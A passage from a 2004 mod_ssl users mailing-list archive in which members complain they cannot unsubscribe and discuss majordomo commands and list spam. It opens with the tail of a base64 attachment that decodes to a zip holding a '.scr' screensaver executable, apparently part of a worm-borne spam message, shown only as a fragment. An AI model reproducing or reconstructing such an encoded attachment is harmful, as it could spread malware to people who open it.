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

----------vdkmicbsddjewlhtjmsg--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From skip@mojam.com  Wed Mar 31 18:03:01 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from manatee.mojam.com (manatee.mojam.com [199.249.165.175])
	by master.modssl.org (Postfix) with ESMTP id D0728A898B
	for ; Wed, 31 Mar 2004 18:02:44 +0200 (CEST)
Received: from montanaro.dyndns.org (c-24-12-188-128.client.comcast.net [24.12.188.128])
	by manatee.mojam.com (8.12.1-20030917/8.12.1) with ESMTP id i2VG2aeU016711;
	Wed, 31 Mar 2004 10:02:37 -0600
Received: from montanaro.dyndns.org (localhost [127.0.0.1])
	by montanaro.dyndns.org (8.12.9/8.12.6) with ESMTP id i2VG2RxG009091;
	Wed, 31 Mar 2004 10:02:28 -0600 (CST)
Received: by montanaro.dyndns.org (8.12.9/8.12.2/Submit) id i2VG2RAh009088;
	Wed, 31 Mar 2004 10:02:27 -0600 (CST)
From: Skip Montanaro 
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-ID: <16490.60307.155303.237206@montanaro.dyndns.org>
Date: Wed, 31 Mar 2004 10:02:27 -0600
To: "Fischer, Eric" 
Cc: "'Jeff Hallgren'" ,
	"'modssl-users-l@master.modssl.org'" 
Subject: RE: Shut the list down
In-Reply-To: 
References: 
X-Mailer: VM 7.17 under 21.5  (beta16) "celeriac" (+CVS-20040209) XEmacs Lucid
Reply-To: skip@pobox.com


    Eric> I have also been unable to un-subscribe. This has been a problem
    Eric> for a while.

Moi aussi.  

-- 
Skip Montanaro
Got gigs? http://www.musi-cal.com/submit.html
Got spam? http://www.spambayes.org/
skip@pobox.com

From praise@praisenet.darktech.org  Wed Mar 31 18:04:13 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from praisenet.darktech.org (host107-141.pool8251.interbusiness.it [82.51.141.107])
	by master.modssl.org (Postfix) with ESMTP id 6DDA0A8948
	for ; Wed, 31 Mar 2004 18:03:57 +0200 (CEST)
Received: by praisenet.darktech.org (Praisenet Mail 1.0 (i386), from userid 65534)
	id 17AE72E581E; Wed, 31 Mar 2004 18:03:44 +0200 (CEST)
Received: from localhost (localhost [127.0.0.1])
	by praisenet.darktech.org (Praisenet Mail 1.0 (i386)) with ESMTP id 525032E5824
	for ; Wed, 31 Mar 2004 18:03:41 +0200 (CEST)
Received: from doom9.praisenet (unknown [192.168.1.7])
	(using TLSv1 with cipher RC4-MD5 (128/128 bits))
	(No client certificate requested)
	by praisenet.darktech.org (Praisenet Mail 1.0 (i386)) with ESMTP id 1FDF52E581E
	for ; Wed, 31 Mar 2004 18:03:38 +0200 (CEST)
From: Tazio Ceri 
Organization: Praisenet
To: modssl-users-l@master.modssl.org
Subject: Re: Shut the list down
Date: Wed, 31 Mar 2004 18:03:41 +0200
User-Agent: KMail/1.5.4
References: <9B66BBD37D5DD411B8CE00508B69700F05ADDEC6@pborolocal.rnib.org.uk>
In-Reply-To: <9B66BBD37D5DD411B8CE00508B69700F05ADDEC6@pborolocal.rnib.org.uk>
MIME-Version: 1.0
Content-Type: Text/Plain;
  charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Content-Description: clearsigned data
Content-Disposition: inline
Message-Id: <200403311803.42241@prules>
X-Virus-Scanned: by AMaViS 0.3.12pre5
X-Spam-Checker-Version: SpamAssassin 2.63 (2004-01-11) on praisenet.praisenet
X-Spam-Status: No, hits=0.0 required=5.0 tests=none autolearn=ham version=2.63
X-Spam-Level: 

=2D----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Alle 17:54, mercoled=EC 31 marzo 2004, John.Airey@rnib.org.uk ha scritto:
> > -----Original Message-----
> > From: Fischer, Eric [mailto:efischer@rsasecurity.com]
> > Sent: Wednesday, 31 March 2004 16:47
> > To: 'Jeff Hallgren'; 'modssl-users-l@master.modssl.org'
> > Subject: RE: Shut the list down
> >
> >
> > I have also been unable to un-subscribe. This has been a problem for a
> > while.
>
> What response do you get when you send
>
> "unsubscribe modssl-users efischer@rsasecurity.com"
>
> In the body of a message to "majordomo@modssl.org"?
>

I have been successuful in unsubscribing. It told me that I was successfull=
y=20
unsubscribed, but I am receiving message from your list.
I cannot unsubscribe any more because it thinks I am already unsubscribed.
=2D----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.2 (GNU/Linux)

iD8DBQFAauvd4xdXbJVtuJMRAhzpAJ9bx28QIieyl3pUvcVRaby4xAxBSgCfacn2
Xx0xq0xFSxoFreK2D0BOKCc=3D
=3DMMwe
=2D----END PGP SIGNATURE-----


From efischer@rsasecurity.com  Wed Mar 31 18:07:54 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from vulcan.rsasecurity.com (vulcan.rsasecurity.com [204.167.114.130])
	by master.modssl.org (Postfix) with ESMTP id 651FEA8974
	for ; Wed, 31 Mar 2004 18:07:38 +0200 (CEST)
Received: from ebola.securitydynamics.com by vulcan.rsasecurity.com
          via smtpd (for [195.27.176.156]) with ESMTP; Wed, 31 Mar 2004 11:07:34 -0500
Received: from sdtihq24.securid.com (localhost [127.0.0.1])
	by ebola.securitydynamics.com (8.12.10/NULL) with ESMTP id i2VG723l021189;
	Wed, 31 Mar 2004 11:07:02 -0500 (EST)
Received: from exna00.securitydynamics.com (exna00.securitydynamics.com [10.100.8.217])
	by sdtihq24.securid.com (8.12.10/8.12.9) with ESMTP id i2VG7W05011484;
	Wed, 31 Mar 2004 11:07:32 -0500 (EST)
Received: by exna00.securitydynamics.com with Internet Mail Service (5.5.2657.72)
	id ; Wed, 31 Mar 2004 10:54:22 -0500
Message-ID: 
From: "Fischer, Eric" 
To: "'Tazio Ceri'" ,
	"'modssl-users-l@master.modssl.org'" 
Subject: unsubscribe modssl-users efischer@rsasecurity.com
Date: Wed, 31 Mar 2004 11:06:49 -0500
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2657.72)
Content-Type: text/plain

unsubscribe modssl-users efischer@rsasecurity.com

From villegas@math.gatech.edu  Wed Mar 31 18:17:03 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from math.gatech.edu (math.gatech.edu [130.207.146.50])
	by master.modssl.org (Postfix) with ESMTP id 027D1A8A6D
	for ; Wed, 31 Mar 2004 18:16:43 +0200 (CEST)
Received: from hemi.math.gatech.edu (hemi.math.gatech.edu [130.207.146.192])
	by math.gatech.edu (8.12.10/8.12.10) with ESMTP id i2VGGVjn027638;
	Wed, 31 Mar 2004 11:16:34 -0500 (EST)
Received: by hemi.math.gatech.edu (Postfix, from userid 383)
	id 6F1B8844E0; Wed, 31 Mar 2004 11:16:31 -0500 (EST)
Date: Wed, 31 Mar 2004 11:16:31 -0500
From: Carlos Villegas 
To: "Fischer, Eric" 
Cc: "'Tazio Ceri'" ,
	"'modssl-users-l@master.modssl.org'" 
Subject: Re: unsubscribe modssl-users efischer@rsasecurity.com
Message-ID: <20040331161631.GT1386@hemi.math.gatech.edu>
References: 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: 
User-Agent: Mutt/1.4.1i
X-GTMath-Relay: 130.207.146.192
X-Spam-Status: SpamAssassin not applied to messages from Local Relay
X-Scanned-By: MIMEDefang 2.37

On Wed, Mar 31, 2004 at 11:06:49AM -0500, Fischer, Eric wrote:
> unsubscribe modssl-users efischer@rsasecurity.com

That should be sent to majordomo@modssl.org NOT to where you sent
it. I'm not sure if the unsubscribe is or not working, but that
will not work for sure....

Carlos


From efischer@rsasecurity.com  Wed Mar 31 18:20:49 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from vulcan.rsasecurity.com (vulcan.rsasecurity.com [204.167.114.130])
	by master.modssl.org (Postfix) with ESMTP id 3E977A898B
	for ; Wed, 31 Mar 2004 18:20:33 +0200 (CEST)
Received: from ebola.securitydynamics.com by vulcan.rsasecurity.com
          via smtpd (for [195.27.176.156]) with ESMTP; Wed, 31 Mar 2004 11:20:29 -0500
Received: from sdtihq24.securid.com (localhost [127.0.0.1])
	by ebola.securitydynamics.com (8.12.10/NULL) with ESMTP id i2VGJv3l022869;
	Wed, 31 Mar 2004 11:19:57 -0500 (EST)
Received: from exna00.securitydynamics.com (exna00.securitydynamics.com [10.100.8.217])
	by sdtihq24.securid.com (8.12.10/8.12.9) with ESMTP id i2VGKP05012737;
	Wed, 31 Mar 2004 11:20:25 -0500 (EST)
Received: by exna00.securitydynamics.com with Internet Mail Service (5.5.2657.72)
	id ; Wed, 31 Mar 2004 11:07:15 -0500
Message-ID: 
From: "Fischer, Eric" 
To: "'Carlos Villegas'" 
Cc: "'Tazio Ceri'" ,
	"'modssl-users-l@master.modssl.org'" 
Subject: RE: unsubscribe modssl-users efischer@rsasecurity.com
Date: Wed, 31 Mar 2004 11:19:41 -0500
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2657.72)
Content-Type: text/plain

Thanks for the heads up,

I replied to all on accident... Actually I bcc'd majordomo on the list again
and got the same error started by the other list user. 

-----Original Message-----
From: Carlos Villegas [mailto:villegas@math.gatech.edu] 
Sent: Wednesday, March 31, 2004 11:17 AM
To: Fischer, Eric
Cc: 'Tazio Ceri'; 'modssl-users-l@master.modssl.org'
Subject: Re: unsubscribe modssl-users efischer@rsasecurity.com

On Wed, Mar 31, 2004 at 11:06:49AM -0500, Fischer, Eric wrote:
> unsubscribe modssl-users efischer@rsasecurity.com

That should be sent to majordomo@modssl.org NOT to where you sent it. I'm
not sure if the unsubscribe is or not working, but that will not work for
sure....

Carlos

From mike.collins@tds.net  Wed Mar 31 18:25:34 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from outbound3.mail.tds.net (outbound3.mail.tds.net [216.170.230.93])
	by master.modssl.org (Postfix) with ESMTP
	id 94D7CA898B; Wed, 31 Mar 2004 18:25:18 +0200 (CEST)
Received: from smtp.tds.net (fep10.mail.tds.net [216.170.230.109])
	by outbound3.mail.tds.net (8.12.10/8.12.2) with SMTP id i2VGPCbk000322;
	Wed, 31 Mar 2004 10:25:12 -0600 (CST)
Message-Id: <200403311625.i2VGPCbk000322@outbound3.mail.tds.net>
X-Mailer: Openwave WebEngine, version 2.8.12 (webedge20-101-197-20030912)
From: 
To: 
Cc: 
Subject: Re: Shut the list down
Date: Wed, 31 Mar 2004 10:25:12 -0600
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit

I have also attempted to remove myself from this list several times in recent months to no avail.  I have also sent email requests specifically to the list administrator which was disregarded.  I neglected to send my unsubscribe requests to the modssl-user list because it was somewhat outside the scope of appropriate subject matter for the list.  But as I see others have similar issues with the inability to subscribe, spam, etc, I am requesting again to be manually removed from this list.

Thank you.

> 
> From: Jeff Hallgren 
> Date: 2004/03/31 Wed AM 09:42:08 CST
> To: modssl-users-l@master.modssl.org
> Subject: Shut the list down
> 
> I've tried for weeks now to get off the modssl-users email list.
> The web site pages at www.modssl.org for subscribe/unsubscribe do not 
> work.
> The majordomo interface, while it is responsive, is apparently 
> non-functional.
> 
> I would ask that the managers/owner of the modssl-users list (or 
> modssl-users-l?) take some responsibility for the problems -( spam, 
> inability to get removed from list).
> Shut all the lists down, re-name them and ask interested folks to 
> re-subscribe.
> 
> Come on guys, fix this!
> Jeff
> 
> 


From chris@katjam.co.uk  Wed Mar 31 18:31:29 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from mta06-svc.ntlworld.com (mta06-svc.ntlworld.com [62.253.162.46])
	by master.modssl.org (Postfix) with ESMTP id 2FD59A8A55
	for ; Wed, 31 Mar 2004 18:31:11 +0200 (CEST)
Received: from [192.168.0.3] ([80.7.146.124]) by mta06-svc.ntlworld.com
          (InterMail vM.4.01.03.37 201-229-121-137-20020806) with ESMTP
          id <20040331163110.CRMW19383.mta06-svc.ntlworld.com@[192.168.0.3]>
          for ;
          Wed, 31 Mar 2004 17:31:10 +0100
Subject: [Fwd: Re: Shut the list down]
From: Chris Covell 
Reply-To: chris@katjam.co.uk
To: modssl 
Content-Type: multipart/mixed; boundary="=-603zHfuF+vaJ8thrVeL1"
Message-Id: <1080750666.5529.2.camel@Fedora>
Mime-Version: 1.0
X-Mailer: Ximian Evolution 1.4.5 (1.4.5-7) 
Date: Wed, 31 Mar 2004 17:31:06 +0100


--=-603zHfuF+vaJ8thrVeL1
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

I have the same story as everyone else that has posted today. If the
list admin is not going to shut the list down, then please include me on
the list of people that want to be removed.

Chris...

--=-603zHfuF+vaJ8thrVeL1
Content-Disposition: inline
Content-Description: Forwarded message - Re: Shut the list down
Content-Type: message/rfc822

Return-Path: 
Received: from shawn.braidwood.co.uk (shawn.braidwood.co.uk [212.125.95.4])
	by s1.uklinux.net (8.11.6/8.11.6) with SMTP id i2VGPsi20422 for
	; Wed, 31 Mar 2004 17:25:54 +0100
Envelope-To: 
Received: (qmail 30383 invoked by uid 515); 31 Mar 2004 16:25:54 -0000
Delivered-To: katjam-chris@katjam.co.uk
Received: (qmail 30379 invoked from network); 31 Mar 2004 16:25:54 -0000
Received: from mmx.engelschall.com (195.27.130.252) by
	shawn.braidwood.co.uk with SMTP; 31 Mar 2004 16:25:54 -0000
Received: by mmx.engelschall.com (Postfix) id 3282E19389; Wed, 31 Mar 2004
	18:25:31 +0200 (CEST)
Received: from master.modssl.org (unknown [195.27.176.156]) by
	mmx.engelschall.com (Postfix) with ESMTP id 2373819301 for
	; Wed, 31 Mar 2004 18:25:31 +0200
	(CEST)
Received: by master.modssl.org (Postfix) id D1E0DA8939; Wed, 31 Mar 2004
	18:25:34 +0200 (CEST)
Delivered-To: modssl-users-l@master.modssl.org
Received: from outbound3.mail.tds.net (outbound3.mail.tds.net
	[216.170.230.93]) by master.modssl.org (Postfix) with ESMTP id 94D7CA898B;
	Wed, 31 Mar 2004 18:25:18 +0200 (CEST)
Received: from smtp.tds.net (fep10.mail.tds.net [216.170.230.109]) by
	outbound3.mail.tds.net (8.12.10/8.12.2) with SMTP id i2VGPCbk000322; Wed,
	31 Mar 2004 10:25:12 -0600 (CST)
Message-Id: <200403311625.i2VGPCbk000322@outbound3.mail.tds.net>
X-Mailer: Openwave WebEngine, version 2.8.12 (webedge20-101-197-20030912)
From: 
To: 
Cc: 
Subject: Re: Shut the list down
Date: Wed, 31 Mar 2004 10:25:12 -0600
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
X-UIDL: \C~"!\3)"!nc`!!S)^!!
Content-Transfer-Encoding: 7bit

I have also attempted to remove myself from this list several times in recent months to no avail.  I have also sent email requests specifically to the list administrator which was disregarded.  I neglected to send my unsubscribe requests to the modssl-user list because it was somewhat outside the scope of appropriate subject matter for the list.  But as I see others have similar issues with the inability to subscribe, spam, etc, I am requesting again to be manually removed from this list.

Thank you.

> 
> From: Jeff Hallgren 
> Date: 2004/03/31 Wed AM 09:42:08 CST
> To: modssl-users-l@master.modssl.org
> Subject: Shut the list down
> 
> I've tried for weeks now to get off the modssl-users email list.
> The web site pages at www.modssl.org for subscribe/unsubscribe do not 
> work.
